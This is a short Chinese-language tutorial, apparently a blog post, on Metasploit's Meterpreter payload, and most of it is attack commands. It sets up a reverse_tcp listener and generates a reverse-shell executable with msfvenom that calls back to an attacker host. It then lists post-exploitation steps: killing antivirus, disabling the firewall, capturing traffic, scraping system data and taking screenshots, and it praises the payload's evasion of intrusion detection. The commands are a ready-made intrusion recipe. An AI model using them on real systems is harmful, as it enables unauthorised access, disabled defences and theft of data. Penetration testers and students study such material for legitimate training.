Metasploit Meterpreter
一、什么是Meterpreter
Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕捉按键信息、清楚应用程序、显示、远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS【基于追的入侵检测系统】很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也变得非常困难。
二、常用命令
2.1 进入meterpreter
(1)开启监听
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.244.128 lhost => 192.168.244.128 msf5 exploit(multi/handler) > set lport 1155 lport => 1155 msf5 exploit(multi/handler) > run
(2)生成payload
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.244.128 lport=1155 -f exe > 123.exe
(3)window 7运行 123.exe
(4)查看建立的meterpreter链接

2.2 常用命令
(1)进程迁移
meterpreter > ps
meterpreter > migrate 1524

(2)关闭杀软
meterpreter > kill
(3)关闭防火墙
meterpreter > netsh adcfirewall set allprofiles state off
(4)查看目标主机所有流量
meterpreter > run packetrecorder -i 1
(5) 提取系统信息
meterpreter > run scraper
(6) 截屏
screenshot
(7) 获取系统运行的平台
meterpreter > sysinfo


浙公网安备 33010602011771号